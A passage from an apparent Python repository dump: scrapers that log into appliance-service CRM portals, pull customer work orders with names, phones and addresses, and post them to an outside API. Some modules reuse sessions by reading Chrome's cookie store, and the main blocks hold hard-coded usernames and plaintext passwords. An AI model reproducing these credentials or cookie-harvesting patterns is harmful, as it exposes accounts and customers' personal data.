tablecolumns[1]\n name_td = tablecolumns[3]\n data = {}\n orderitem = orderno_td.find(\"a\")\n nameaddress = self.finda(name_td).split(\" / \")\n if orderitem and orderitem.has_attr('id'):\n data['oid'] = orderitem[\"id\"] # 这个是上一个列表中的工单号元素id,下一个页面需要用到\n data['pid'] = name_td.find(\"a\")['id'] # 这个是上一个列表中的用户名元素id,下一个页面需要用到\n data['factorynumber'] = self.finda(orderno_td)\n data['username'] = nameaddress[0]\n data['originname'] = self.findspan(tablecolumns[4])\n data['ordertime'] = self.findspan(tablecolumns[7]).replace(\".\", '-')\n data['companyid'] = self.companyid\n data['machinebrand'] = \"华帝\"\n data['orderstatus'] = \"工单提交\"\n data['adminid'] = self.adminid\n if len(nameaddress) > 1 and \"-\" in nameaddress[1]:\n address = nameaddress[1].split(\"-\")\n if len(address) > 1:\n data['city'] = address[0]\n data['county'] = address[1]\n # print(\"parseorder data=\")\n # print(data)\n if data['username']:\n data['username'] = data['username'].split(\" \")[0]\n return data if not statuscode or self.isNew(data, self.bjdomain, self.adminid) else None\n except Exception as e:\n print(\"parseorder exception\", e)\n return None\n\n def orderdetail(self, data, url, params, statuscode):\n # print('=========================orderdetail 获取工单详情')\n oid = data['oid']\n params['htmlbevt_ty'] = \"thtmlb:link:click:0\"\n params['htmlbevt_oid'] = oid\n params['thtmlbKeyboardFocusId'] = oid\n params['htmlbevt_id'] = \"HEADEROV\"\n params['htmlbevt_cnt'] = \"0\"\n params['currentDate'] = datetime.now().year\n params['sap-ajaxtarget'] = \"C1_W1_V2_C1_W1_V2_V3_C17_W61_V62_C17_W61_V62_V64_advancedsrl.do\"\n if 'htmlbevt_par1' in params:\n del params['htmlbevt_par1']\n roleRes = self.session.post(url, data=params, headers=self.headers)\n bsObj = self.getsoup(roleRes)\n if statuscode:\n # print(roleRes.text)\n data['orderstatus'] = \"服务完成\" if statuscode == \"M0010ZSIC0003\" else \"回访完成\"\n data['machinetype'] = bsObj.find(\"span\", {\"id\": \"C19_W69_V72_V75_thtmlb_textView_28\"}).text.strip() # 机器类型\n data['buydate'] = bsObj.find(\"span\",\n {\"id\": \"C19_W69_V72_V75_btadminh_ext.zzfld00002y\"}).text.strip() # 购买日期\n data['ordername'] = \"安装\"\n data['sn'] = bsObj.find(\"span\", {\"id\": \"C19_W69_V72_V75_btadminh_ext.zzfld00001r\"}).text.strip() # 条码\n data['version'] = self.getTableRow(bsObj, \"C23_W85_V86_V88_Table_TableHeader\",\n lambda row: self.finda(row[3]) + \"|\") # 产品编号 拼接\n data['machine_dsc'] = self.getTableRow(bsObj, \"C23_W85_V86_V88_Table_TableHeader\",\n lambda row: self.finda(row[6]) + \"|\") # 产品编号 拼接\n data = self.getFinishTime(data, url, params)\n else:\n user_tr = bsObj.find(\"div\", {\"id\": \"C19_W69_V72_0003Content\"}).find(\"tbody\").find(\"tr\")\n data['mobile'] = user_tr.find('span', id=re.compile('partner_no')).text.strip()\n data['address'] = user_tr.find('span', id=re.compile('address_short')).text.strip()\n data['repairtime'] = bsObj.find(\"span\",\n {\"id\": \"C19_W69_V72_V74_btadminh_ext.zzfld00003j\"}).text.strip() # 预约时间\n data['machinetype'] = bsObj.find(\"span\", {\"id\": \"C19_W69_V72_V74_thtmlb_textView_30\"}).text.strip() # 机器类型\n data['buydate'] = bsObj.find(\"span\",\n {\"id\": \"C19_W69_V72_V74_btadminh_ext.zzfld00002y\"}).text.strip() # 购买日期\n data['ordername'] = bsObj.find(\"span\", {\"id\": \"C19_W69_V72_V74_thtmlb_textView_20\"}).text.strip() # 增值服务项\n\n data['description'] = self.getTableRow(bsObj,\n \"C23_W83_V84_V85_TextList_TableHeader\" if not statuscode else \"C24_W90_V91_V92_TextList_TableHeader\",\n lambda row: self.findspan(row[0]) + \":\" + self.finda(row[1]) + \"\\n\")\n yield self.userdetail(data, url, params, statuscode)\n\n def getFinishTime(self, data, url, params):\n # print('=========================getFinishTime 获取工单完工时间')\n param = {\"callbackFlashIslands\": params[\"callbackFlashIslands\"],\n \"callbackSilverlightIslands\": params[\"callbackSilverlightIslands\"],\n \"wcf-secure-id\": params[\"wcf-secure-id\"], \"LTX_PREFIX_ID\": params[\"LTX_PREFIX_ID\"],\n \"PREFIX_ID\": 'C9_W36_V37_', \"crmFrwScrollXPos\": '0', \"crmFrwOldScrollXPos\": '0',\n \"currentDate\": params[\"currentDate\"], 'htmlbevt_ty': \"thtmlb:tableView:navigate:null\",\n 'htmlbevt_oid': \"C31_W114_V115_DatesTable\", 'htmlbevt_frm': \"myFormId\", 'htmlbevt_id': \"tvNavigator\",\n 'htmlbevt_cnt': \"1\", 'htmlbevt_par1': \"page:2,11,10,18,P\",\n 'sap-ajaxtarget': \"C1_W1_V2_C1_W1_V2_V3_C19_W69_V72_C31_W114_V115_Dates.do\",\n 'sap-ajax_dh_mode': \"AUTO\", 'onInputProcessing': \"htmlb\", 'C13_W47_V48_SearchMenuAnchor1': \"UP\",\n 'C8_W34_V35_RecentObjects_isExpanded': \"yes\", 'C23_W85_V86_V88_Table_editMode': \"NONE\",\n 'C19_W69_V72_0001_displaymode': \"X\", 'C23_W85_V86_V87_itemobjecttype_itemobjecttype': \"ALL\",\n 'C23_W85_V86_V88_Table_isCellerator': \"TRUE\", 'C23_W85_V86_V88_Table_rowCount': \"1\",\n 'C23_W85_V86_V88_Table_visibleFirstRow': \"1\",\n 'C23_W85_V86_V88_Table_bindingString': \"//BTAdminI/Table\",\n 'C23_W85_V86_V88_Table_isNavModeActivated': \"TRUE\",\n 'C23_W85_V86_V88_Table_configHash': \"9EEC78D4306657883F5C86BEFC0745B37DA819FE\",\n 'C23_W85_V86_V88_Table_multiParameter': \"0////0////0////0\", 'C19_W69_V72_0002_displaymode': \"X\",\n 'C24_W90_V91_V92_TextList_rowCount': \"3\", 'C24_W90_V91_V92_TextList_visibleFirstRow': \"1\",\n 'C24_W90_V91_V92_TextList_bindingString': \"//Text/Table\",\n 'C24_W90_V91_V92_TextList_isNavModeActivated': \"TRUE\",\n 'C24_W90_V91_V92_TextList_configHash': \"0E513D2C7268EC204F42B18C06AFE9CDEC0335E5\",\n 'C24_W90_V91_V92_TextList_multiParameter': \"0////0////0////0\", 'C19_W69_V72_0003_displaymode': \"X\",\n 'C25_W94_V95_Table_isCellerator': \"TRUE\", 'C25_W94_V95_Table_rowCount': \"0\",\n 'C25_W94_V95_Table_visibleFirstRow': \"1\", 'C25_W94_V95_Table_bindingString': \"//DocList/Table\",\n 'C25_W94_V95_Table_isFrontendSelection': \"TRUE\", 'C25_W94_V95_Table_isNavModeActivated': \"TRUE\",\n 'C25_W94_V95_Table_configHash': \"2B1898492BCC377ECF844081E0C8B91EEB805379\",\n 'C25_W94_V95_Table_multiParameter': \"0////0////0////0\", 'C19_W69_V72_0004_displaymode': \"X\",\n 'C19_W69_V72_0006_displaymode': \"X\", 'C27_W103_V104_ConfCellTable_isCellerator': \"TRUE\",\n 'C27_W103_V104_ConfCellTable_rowCount': \"0\", 'C27_W103_V104_ConfCellTable_visibleFirstRow': \"1\",\n 'C27_W103_V104_ConfCellTable_bindingString': \"//TranceList/Table\",\n 'C27_W103_V104_ConfCellTable_isNavModeActivated': \"TRUE\",\n 'C27_W103_V104_ConfCellTable_configHash': \"7D633AD0A8F7098E6A03D3F0BBA3020EB7F11686\",\n 'C27_W103_V104_ConfCellTable_multiParameter': \"0////0////0////0\", 'C19_W69_V72_0007_displaymode': \"X\",\n 'C19_W69_V72_0008_displaymode': \"X\", 'C29_W108_V109_ConfCellTable_isCellerator': \"TRUE\",\n 'C29_W108_V109_ConfCellTable_rowCount': \"0\", 'C29_W108_V109_ConfCellTable_visibleFirstRow': \"1\",\n 'C29_W108_V109_ConfCellTable_bindingString': \"//ZCall/Table\",\n 'C29_W108_V109_ConfCellTable_isNavModeActivated': \"TRUE\",\n 'C29_W108_V109_ConfCellTable_configHash': \"E24612518975848E7FAA1EF476EBF26F7D025301\",\n 'C29_W108_V109_ConfCellTable_multiParameter': \"0////0////0////0\", 'C19_W69_V72_0009_displaymode': \"X\",\n 'C30_W110_V111_TABLE_rowCount': \"0\", 'C30_W110_V111_TABLE_visibleFirstRow': \"1\",\n 'C30_W110_V111_TABLE_bindingString': \"//ZTAB00011F/Table\",\n 'C30_W110_V111_TABLE_isFrontendSelection': \"TRUE\", 'C30_W110_V111_TABLE_isNavModeActivated': \"TRUE\",\n 'C30_W110_V111_TABLE_configHash': \"47B16290F9622C8097E999109F42C028F547915D\",\n 'C30_W110_V111_TABLE_multiParameter': \"0////0////0////0\", 'C19_W69_V72_0010_displaymode': \"X\",\n 'C31_W114_V115_DatesTable_isCellerator': \"TRUE\", 'C31_W114_V115_DatesTable_rowCount': \"18\",\n 'C31_W114_V115_DatesTable_visibleFirstRow': \"11\",\n 'C31_W114_V115_DatesTable_bindingString': \"//BTDate/Table\",\n 'C31_W114_V115_DatesTable_isNavModeActivated': \"TRUE\",\n 'C31_W114_V115_DatesTable_configHash': \"F1047D2E37AE2DE80BA46A1E06588EDC4440CA8A\",\n 'C31_W114_V115_DatesTable_multiParameter': \"0////0////0////0\", 'C19_W69_V72_0011_displaymode': \"X\",\n 'thtmlbOverviewControllerID': \"C19_W69_V72\", 'crmFrwScrollYPos': \"891\", 'crmFrwOldScrollYPos': \"891\",\n 'thtmlbKeyboardFocusId': \"C31_W114_V115_DatesTable_pag_pg-1\", 'sap-ajax_request': \"X\"}\n url = url + \"?sap-client=800&sap-language=ZH&sap-domainrelax=min&saprole=ZIC_AGENT_08&sapouid=50000265&sapoutype=S\"\n # print(\"self.headers=\", self.headers, \",url=\", url)\n userRes = self.session.post(url, data=param, headers=self.headers)\n # print(\"param=\", param)\n # print(\"getFinishTime result:\", userRes.text)\n bsObj = self.getsoup(userRes)\n try:\n data['repairtime'] = self.getTableRow(bsObj, \"C31_W114_V115_DatesTable_TableHeader\",\n lambda r: self.findspan(r[1]).replace(\".\", '-') + \" \" + self.findspan(\n r[2]), row_no=-4, truncate=False) # crm完工日期作为安装日期\n except Exception as e:\n print(\"getFinishTime exception\", e)\n return data\n\n def userdetail2(self, data, url, params):\n # print('=========================userdetail2 从工单详情进入 查看用户详情')\n data['pid'] = 'C24_W88_V89_btpartner_table[1].thtmlb_oca.EDIT' # 通过元素获取?\n oid = data['oid']\n pid = data['pid']\n del data['pid']\n del data['oid']\n param = params.copy()\n param['htmlbevt_ty'] = \"thtmlb:image:click:null::CL_THTMLB_TABLE_VIEW::EDIT.1\"\n param['htmlbevt_oid'] = pid\n param['thtmlbKeyboardFocusId'] = pid\n param['htmlbevt_id'] = \"ONE_CLICK_ACTION\"\n param['htmlbevt_cnt'] = \"0\"\n param['sap-ajaxtarget'] = \"C1_W1_V2_C1_W1_V2_V3_C24_W84_V87_C29_W103_V104_Partner.do\"\n param['C23_W85_V86_V88_Table_configHash'] = \"9EEC78D4306657883F5C86BEFC0745B37DA819FE\"\n param['C24_W90_V91_V92_TextList_configHash'] = \"0E513D2C7268EC204F42B18C06AFE9CDEC0335E5\"\n param['C24_W90_V91_V92_TextList_multiParameter'] = \"0////0////0////0\"\n param['C24_W90_V91_V92_TextList_bindingString'] = \"//Text/Table\"\n userRes = self.session.post(url, data=param, headers=self.headers)\n bsObj = self.getsoup(userRes)\n data['mobile'] = str(bsObj.find(\"input\", {\"id\": \"C30_W123_V124_commdata_telephonetel\"})[\"value\"])\n data['province'] = str(bsObj.find(\"input\", {\"id\": \"C30_W119_V120_postaldata_region_text\"})[\"value\"])\n data['city'] = str(bsObj.find(\"input\", {\"id\": \"C30_W119_V120_postaldata_city\"})[\"value\"])\n data['county'] = str(bsObj.find(\"input\", {\"id\": \"C30_W119_V120_postaldata_district\"})[\"value\"])\n data['address'] = str(bsObj.find(\"input\", {\"id\": \"C30_W119_V120_postaldata_street\"})[\"value\"]) # 用户详细地址\n data = self.clearAddress(data)\n # print('=========================orderdetail2 最终数据')\n # print(data)\n self.back2order(pid, url, params)\n self.back2orderlist(oid, url, params)\n return data\n\n def filterstr(self, address, filterstr):\n if address and filterstr and filterstr in address and address.startswith(filterstr):\n return address.replace(filterstr, '', 1)\n else:\n return address\n\n def userdetail(self, data, url, params, statuscode):\n # print('=========================userdetail 从工单列表进入查看用户详情')\n oid = data['oid']\n self.back2orderlist(oid, url, params) # 返回到工单列表\n del data['oid']\n pid = data['pid']\n del data['pid']\n params['htmlbevt_ty'] = \"thtmlb:link:click:0\"\n params['htmlbevt_oid'] = pid\n params['thtmlbKeyboardFocusId'] = pid\n params['htmlbevt_id'] = \"SOLD_TO_PARTY\"\n params['htmlbevt_cnt'] = \"0\"\n params['sap-ajaxtarget'] = \"C1_W1_V2_C1_W1_V2_V3_C17_W61_V62_C17_W61_V62_V64_advancedsrl.do\"\n params['C17_W61_V62_V64_ResultTable_configHash'] = \"F698293684A5C954932EE6CB006466A1645E5EF5\"\n userRes = self.session.post(url, data=params, headers=self.headers)\n bsObj = self.getsoup(userRes) # C30_W119_V120_postaldata_street\n data['mobile'] = bsObj.find('span', id=re.compile('.TELEPHONE')).text.strip() # 用户电话\n data['city'] = bsObj.find('input', id=re.compile('.city'))[\"value\"] # 用户城市\n data['address'] = str(bsObj.find('input', id=re.compile('.street'))[\"value\"]) # 用户详细地址\n data = self.clearAddress(data)\n # print('=========================orderdetail 最终数据')\n # print(data)\n self.back2orderlist(pid, url, params)\n return data\n\n def back2order(self, id, url, params):\n # print('=========================后退到工单详情')\n params_new = params.copy()\n params_new['htmlbevt_ty'] = \"htmlb:button:click:0\"\n params_new['htmlbevt_oid'] = \"C24_W111_V112_V113_thtmlb_button_1\"\n params_new['thtmlbKeyboardFocusId'] = \"C24_W111_V112_V113_thtmlb_button_1\"\n params_new['htmlbevt_id'] = \"done\"\n params_new['htmlbevt_cnt'] = \"0\"\n params_new['sap-ajaxtarget'] = \"C1_W1_V2_C1_W1_V2_V3_C24_W111_V112_C24_W111_V112_V113_PartnerEFHeader.do\"\n params_new['sap-ajax_dh_mode'] = \"AUTO\"\n params_new['C13_W47_V48_SearchMenuAnchor1'] = \"UP\"\n params_new['C8_W34_V35_RecentObjects_isExpanded'] = \"yes\"\n self.session.post(url, data=params_new, headers=self.headers)\n\n def back2orderlist(self, id, url, params):\n # print('=========================返回工单列表')\n params_new = params\n params_new['htmlbevt_ty'] = \"htmlb:link:click:null\"\n params_new['htmlbevt_oid'] = \"C1_W1_V2_V3_V55_back\"\n params_new['thtmlbKeyboardFocusId'] = id\n params_new['htmlbevt_id'] = \"back\"\n params_new['htmlbevt_cnt'] = \"1\"\n params_new['htmlbevt_par1'] = \"#\"\n params_new['C23_W83_V84_V85_TextList_bindingString'] = \"//Text/Table\"\n params_new['C24_W88_V89_Table_selectedRows'] = \"1\"\n params_new['C24_W88_V89_Table_rowCount'] = \"1\"\n params_new['thtmlbOverviewControllerID'] = \"C19_W69_V72\"\n params_new['C28_W104_V105_Table_bindingString'] = \"//DocList/Table\"\n params_new['C28_W104_V105_Table_configHash'] = \"2B1898492BCC377ECF844081E0C8B91EEB805379\"\n params_new['C28_W104_V105_Table_multiParameter'] = \"0////0////0////0\"\n params_new['C19_W69_V72_0006_displaymode'] = \"X\"\n params_new['C27_W101_V102_ConfCellTable_multiParameter'] = \"7D633AD0A8F7098E6A03D3F0BBA3020EB7F11686\"\n params_new['C27_W101_V102_ConfCellTable_configHash'] = \"0////0////0////0\"\n params_new['C24_W88_V89_Table_allRowSelected'] = \"FALSE\"\n params_new['C25_W92_V93_V95_Table_bindingString'] = \"//BTAdminI/Table\"\n params_new['sap-ajaxtarget'] = \"C1_W1_V2_C1_W1_V2_V3_C1_W1_V2_V3_V55_BreadCrumbView.do\"\n self.session.post(url, data=params_new, headers=self.headers)\n\n\nif __name__ == '__main__':\n hdscrap = HDScrap('01007544', pwd='160324', adminid='24', bjdomain='http://gsn.bangjia.me')\n res = hdscrap.loginHd()\n # grap_res = hdscrap.transfer_order()\n # print(grap_res)\n grap_res = hdscrap.transfer_order(statuscode='M0010ZSIC0003')\n print(grap_res)\n # grap_res = hdscrap.transfer_order(statuscode='M0013ZSIC0004')\n # print(grap_res)\n"
},
{
"alpha_fraction": 0.5677496194839478,
"alphanum_fraction": 0.5998415350914001,
"avg_line_length": 28.69411849975586,
"blob_id": "b7e9c0c4bf185f4164cec34fc708cf21a0f726aa",
"content_id": "000d1efacd07ce3722437ddca9c4be83babfc437",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2612,
"license_type": "no_license",
"max_line_length": 95,
"num_lines": 85,
"path": "/searchutil.py",
"repo_name": "chengyan1984/cdk-gui",
"src_encoding": "UTF-8",
"text": "import json\n\nimport requests\n\nbase_url = \"http://114.55.168.6/\"\nsearch_api = base_url + \"es-test/essearch.php\"\noper_api = base_url + \"es-test/oper-search.php\"\n\n\n# 操作类别:1:建单 2:派单 3:审核 4:结算 5:回访\ndef getAdminids():\n params = dict()\n params['method'] = 'search'\n params['index'] = 'yxgoper'\n params['from'] = 0\n params['size'] = 30\n params['groupby'] = 'adminid'\n params['keyword'] = ''\n params['field_return'] = 'adminid'\n checkRes = requests.post(search_api, data=params)\n checkRes.encoding = 'utf-8'\n\n adminids = []\n if checkRes and checkRes.status_code == 200:\n # print(\"获取所有网点id成功:\")\n # print(checkRes.text)\n results = json.loads(checkRes.text)\n adminids.append('24')\n for element in results['element']:\n adminids.append(str(element['adminid']))\n return adminids\n\n\ndef getMasters(adminid):\n params = dict()\n params['method'] = 'search'\n params['index'] = 'yxgoper'\n params['from'] = 0\n params['size'] = 100\n params['groupby'] = 'username'\n params['keyword'] = ''\n params['field_return'] = ['username', 'userid']\n params['adminid'] = adminid\n checkRes = requests.post(search_api, data=params)\n checkRes.encoding = 'utf-8'\n\n adminids = []\n if checkRes and checkRes.status_code == 200:\n # print(\"获取所有网点id成功:\")\n print(checkRes.text)\n results = json.loads(checkRes.text)\n adminids.append({'userid': '', 'username': '全部'})\n for element in results['element']:\n adminids.append(element)\n return adminids\n\n\n# print(getMasters(24))\n\ndef getOperators(adminid, userid, start, end):\n params = dict()\n params['method'] = 'search'\n params['index'] = 'yxgoper'\n params['from'] = 0\n params['size'] = 100\n params['groupby'] = 'opertype'\n params['keyword'] = ''\n params['opertime'] = json.dumps([['egt', start], ['elt', end], 'and'])\n params['userids'] = json.dumps(userid)\n params['field_return'] = json.dumps(['username', 'opertype'])\n params['adminid'] = adminid\n checkRes = requests.post(oper_api, data=params)\n checkRes.encoding = 'utf-8'\n\n opers = []\n if checkRes and checkRes.status_code == 200:\n # print(\"获取所有网点id成功:\")\n print(checkRes.text)\n results = json.loads(checkRes.text)\n for element in results['element']:\n opers.append(element)\n return opers\n\n# print(getMasters('24'))\n# print(getOperators('24', ['250', '281', '23'], '2020-01-08 00:00:00', '2020-05-08 00:00:00'))\n"
},
{
"alpha_fraction": 0.5681578516960144,
"alphanum_fraction": 0.5902997255325317,
"avg_line_length": 47.81617736816406,
"blob_id": "9b1958804e3bdd338237843d05c98c8053b94ddc",
"content_id": "6c3c7332976f9ec14b1d18aeb2b9f8c45fc897e8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 6643,
"license_type": "no_license",
"max_line_length": 113,
"num_lines": 136,
"path": "/TCSMCookieUtil.py",
"repo_name": "chengyan1984/cdk-gui",
"src_encoding": "UTF-8",
"text": "import io\nimport json\nimport re\nimport sys\nimport unicodedata\nfrom datetime import date, timedelta\nfrom urllib import parse\n\nimport chardet\nimport requests\nfrom idna import unicode\n\nfrom BaseUtil import BaseUtil\nfrom cookie_test import fetch_chrome_cookie\n\n\nclass TCSMUtil(BaseUtil):\n\n def __init__(self, username, passwd, adminid='24', factoryid='6', baseurl='http://hk2.koyoo.cn/',\n bjdomain='http://yxgtest.bangjia.me'):\n super(TCSMUtil, self).__init__(username, passwd, adminid, factoryid, baseurl, bjdomain)\n self.headers['Content-Type'] = 'application/x-www-form-urlencoded; charset=UTF-8'\n self.cookie = fetch_chrome_cookie([{\"domain\": \".koyoo.cn\"}], isExact=False)\n self.cookies = BaseUtil.getCookies(self.cookie)\n self.headers['Cookie'] = self.cookie\n self.headers['Accept-Encoding'] = 'gzip, deflate'\n self.skills = []\n\n def login(self, param=None):\n pass\n\n def islogin(self):\n self.headers['Accept'] = \"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,\" \\\n \"*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\"\n self.headers['Content-Type'] = 'application/x-www-form-urlencoded; charset=UTF-8'\n self.headers['Referer'] = self.baseurl + 'index.php?m=index&f=index'\n url = self.baseurl + \"index.php?m=workorder&f=handleIndex\"\n response = self.session.get(url, headers=self.headers)\n bsObj = self.getsoup(response)\n skillselect = bsObj.find(\"select\", {\"id\": \"skill\"})\n if skillselect:\n skills = skillselect.find_all('option')\n self.skills = skills\n return skills is not None\n else:\n return False\n\n def loadOrders(self, param=None):\n if not self.islogin():\n print(\"loadOrders is not login\")\n return self.dataverify\n self.headers['Accept'] = \"application/json, text/javascript, */*; q=0.01\"\n self.headers['Content-Type'] = 'application/x-www-form-urlencoded; charset=UTF-8'\n try:\n data = {\"data\": json.dumps(self.loadOrderbySkill())}\n requests.post(self.bjdomain + \"/Api/Climborder/addorder\", data=data)\n except Exception as e:\n print(\"loadOrders except:\", e)\n return self.datafail\n return self.datasuccess\n\n def loadOrderbySkill(self):\n # print(\"loadOrderbySkill skills={}\".format(self.skills))\n results = []\n for skill in self.skills:\n print(\"loadOrderbySkill skill={}\".format(skill[\"value\"]))\n # list(self.loadPageOrder(skill[\"value\"]))\n results += list(self.loadPageOrder(skill[\"value\"]))\n print(\"loadOrderbySkill results={}\".format(results))\n return results\n\n def loadPageOrder(self, skill=4209, page=1, totalcount=100, pageSize=100):\n dataurl = self.baseurl + \"index.php?m=workorder&f=gridIndex\"\n data = {\"page\": page, \"rows\": pageSize, \"skillId\": skill, \"listType\": \"handle\",\n \"optid\": \"e7317288bb6d4849eec6dbe010d5d34e\", \"0[name]\": \"skill\", \"0[value]\": skill,\n \"1[name]\": \"Q|t2.dealstate|in\", \"1[value]\": \"OS_100,OS_400,OS_700,SS_W_REMIND\",\n \"27[name]\": \"isSearch\", \"27[value]\": 1,\n \"10[name]\": \"Q|t2.createtime|egt\", \"10[value]\": BaseUtil.getDateBefore(3),\n \"11[name]\": \"Q|t2.createtime|elt\", \"11[value]\": BaseUtil.getDateBefore(0),\n }\n self.headers['Referer'] = dataurl\n # print(\"loadPageOrder data ={}\".format(data))\n response = self.session.post(dataurl, headers=self.headers, data=parse.urlencode(data))\n response.encoding = 'gbk'\n resStr = response.text\n # sys.stdout = io.TextIOWrapper(sys.stdout.buffer, encoding='gb18030')\n print(\"loadOrders response={}\".format(resStr))\n resStr = re.sub(r'<label[^()]*?>', '', resStr)\n resStr = resStr.replace(\"<\\\\/label>\", \"\")\n # resStr = resStr.encode(\"utf-8\").decode(\"gbk\")\n # resStr = resStr.encode(\"gbk\", 'ignore').decode(\"utf-8\", 'ignore')\n resStr = unicodedata.normalize('NFKD', resStr).encode('ascii', 'ignore').decode(\"utf-8\", 'ignore')\n # resStr = resStr.encode(\"GBK\", 'ignore').decode(\"unicode_escape\")\n # print(chardet.detect(resStr))\n # resStr = resStr.encode(\"utf-8\").decode('unicode_escape')\n # \"\"\"'gbk' codec can't encode character '\\ufeff' in position 0: ???\"\"\"\n resStr = \"{\" + resStr\n print(resStr)\n if response.status_code == 200:\n result = json.loads(resStr)\n totalcount = result['total']\n if page * pageSize >= totalcount:\n yield from self.parseOrders(result)\n else:\n yield from self.parseOrders(result)\n yield from self.loadPageOrder(page + 1, totalcount, pageSize)\n\n def parseOrders(self, data):\n for item in data['rows']:\n yield {\n 'factorynumber': self.parseHtml(item['worksn']), 'ordername': item['demandsmall'],\n 'username': item['customername'], 'mobile': item['customertel'],\n 'orderstatus': item['dealstate'], 'originname': item['srctype'],\n 'machinetype': item['probcate_id'], 'machinebrand': item['brand_id'],\n # 'sn': '', 'version': item['PRODUCT_MODEL'] if 'PRODUCT_MODEL' in item else '',\n 'repairtime': item['askdate'] + \" \" + (BaseUtil.getTimeStr(item['asktime'])),\n 'mastername': item['enginename'] if 'enginename' in item else '',\n # 'note': BeautifulSoup(item['processremark'], 'lxml').label.string,\n 'note': item['processremark'],\n 'companyid': self.factoryid, 'adminid': self.adminid,\n # 'address': BeautifulSoup(item['address'], 'lxml').label.string,\n 'address': item['address'],\n # 'province': item['provinceName'], 'city': item['cityName'],\n # 'county': item['regionName'], 'town': item['countyName'],\n 'ordertime': item['createtime'],\n # 'description': BeautifulSoup(item['clientrequirement'], 'lxml').label.string,\n 'description': item['clientrequirement'],\n }\n\n\nif __name__ == '__main__':\n # util = ConkaUtil('K608475', 'Kuser6646!', adminid='20699', factoryid='1')\n util = TCSMUtil('AW3306009461', 'Md123456789!', adminid='24', factoryid='4')\n # util = ConkaUtil('K608069', 'Crm@20200401', adminid='24', factoryid='1')\n print(util.loadOrders())\n # print(util.loadPageOrder())\n"
},
{
"alpha_fraction": 0.5546392798423767,
"alphanum_fraction": 0.5650887489318848,
"avg_line_length": 51.6026496887207,
"blob_id": "23cb827652eeacdbef4f5984c2f700359ce34235",
"content_id": "8e5674d026b914db14c43136d14fc0f06dfce608",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 16426,
"license_type": "no_license",
"max_line_length": 258,
"num_lines": 302,
"path": "/CDKCookieUtil.py",
"repo_name": "chengyan1984/cdk-gui",
"src_encoding": "UTF-8",
"text": "import datetime\nimport json\nimport re\nimport time\nfrom urllib import parse\nfrom urllib.parse import urlparse\n\nimport requests\nfrom BaseUtil import BaseUtil\nfrom cookie_test import fetch_chrome_cookie\n\n\nclass CDKCookieUtil(BaseUtil):\n\n def __init__(self, username='', passwd='', adminid='24', factoryid='18', baseurl='http://cdk.rrs.com',\n bjdomain='http://yxgtest.bangjia.me'):\n super(CDKCookieUtil, self).__init__(username, passwd, adminid, factoryid, baseurl, bjdomain)\n self.headers['Accept'] = \"application/json, text/plain, */*\"\n self.headers['Content-Type'] = 'application/json'\n self.cookie = fetch_chrome_cookie([{\"domain\": \".rrs.com\"}], isExact=False)\n self.cookies = BaseUtil.getCookies(self.cookie)\n self.headers['Cookie'] = self.cookie\n self.azbaseurl = '' # cdk安装的baseurl,海尔安装单要用到:http://cdkaz.rrs.com\n self.azhost = '' # cdk安装的host:cdkaz.rrs.com\n\n def loadOrders(self, param=None):\n # # 开始加载工单\n # self.headers['Accept'] = \"*/*\"\n # self.headers['Content-Type'] = 'application/json'\n # try:\n # data = {\"data\": json.dumps(list(self.loadPageOrder()))}\n # requests.post(self.bjdomain + \"/Api/Climborder/addorder\", data=data)\n # except:\n # return self.dataverify\n # return self.datasuccess\n # print(self.cookies)\n if not self.islogin():\n return self.dataverify\n isSuccess = True\n haierRes = self.loadHaierOrder() # 抓取海尔工单\n # print(\"loadHaierOrder result=\", haierRes)\n isSuccess = isSuccess and haierRes['code'] == 1\n netorder = self.loadWangdan()\n # 1: 表示维修 2 表示安装 3 表示鸿合维修单 4 表示清洁保养\"\"\"\n if not netorder:\n return self.dataverify\n netRes = self.loadNetworkOrder(netorder, 5) # 抓取网单 - 所有\n isSuccess = isSuccess and netRes['code'] == 1\n # netRes = self.loadNetworkOrder(netorder, 2) # 抓取网单 - 安装\n # isSuccess = isSuccess and netRes['code'] == 1\n # netRes = self.loadNetworkOrder(netorder, 1) # 抓取网单 - 维修\n # isSuccess = isSuccess and netRes['code'] == 1\n # netRes = self.loadNetworkOrder(netorder, 3) # 抓取网单 - 鸿合维修单\n # isSuccess = isSuccess and netRes['code'] == 1\n # netRes = self.loadNetworkOrder(netorder, 4) # 抓取网单 - 清洁保养\n # isSuccess = isSuccess and netRes['code'] == 1\n return self.datasuccess if isSuccess else self.datafail\n\n def islogin(self):\n url = self.baseurl + \"/manager-web/index.do\"\n if 'userCookie' in self.cookies:\n url += \"?token=\" + self.cookies['userCookie']\n header = self.headers.copy()\n header[\n 'Accept'] = 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9'\n # header['Referer'] = self.baseurl\n response = self.session.get(url, headers=header)\n soup = self.getsoup(response)\n # print(soup)\n haierSpan = soup.find('span', text=re.compile('海尔安装'))\n # print(\"+++++++++++++++++++++++++++++++getHaierUrl\")\n # print(haierSpan)\n if not haierSpan:\n return False\n parsed_url = urlparse(haierSpan['href'])\n self.azhost = parsed_url.netloc\n self.azbaseurl = parsed_url.scheme + \"://\" + parsed_url.netloc\n params = dict(parse.parse_qsl(parsed_url.query))\n if 'token' not in params:\n return False\n token = params['token']\n self.cookies['token'] = token\n # 进入海尔工单的验证流程\n param = json.dumps({\"token\": params['token'], \"moduleCode\": \"04\", \"userId\": \"\"})\n header = self.headers.copy()\n header['Host'] = self.azhost\n header['Origin'] = self.azbaseurl\n header['Referer'] = self.azbaseurl + \"/pages/indexcdk?moduleCode=04&newTopWindow=true&token=\" + token\n r0 = self.session.post(self.azbaseurl + \"/api/system/authMenu/auth\", data=param, headers=header)\n r = self.session.post(self.azbaseurl + \"/api/system/authMenu/authMenuChanges\", data=param, headers=header)\n # r2 = self.session.post(self.baseurl + \"/manager-web/getCdkscIndexData.do\", headers=header)\n return self.isSuccess(r0) and self.isSuccess(r) # and self.isSuccess(r2)\n\n def isSuccess(self, r):\n authresult = self.getjson(r)\n if not authresult or 'success' not in authresult or not authresult['success']:\n return False\n # if 'serviceCode' in authresult and authresult['serviceCode']:\n # self.serviceCode = authresult['serviceCode']\n return True\n\n def loadWangdan(self):\n 